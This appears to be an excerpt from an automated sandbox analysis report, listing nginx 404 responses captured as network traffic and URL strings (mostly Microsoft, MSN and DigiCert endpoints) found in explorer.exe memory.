Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:06:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:06:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1814735549.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1813184602.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1812705551.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1817769724.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1817769724.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1810967326.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1813742183.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1813742183.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1817769724.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
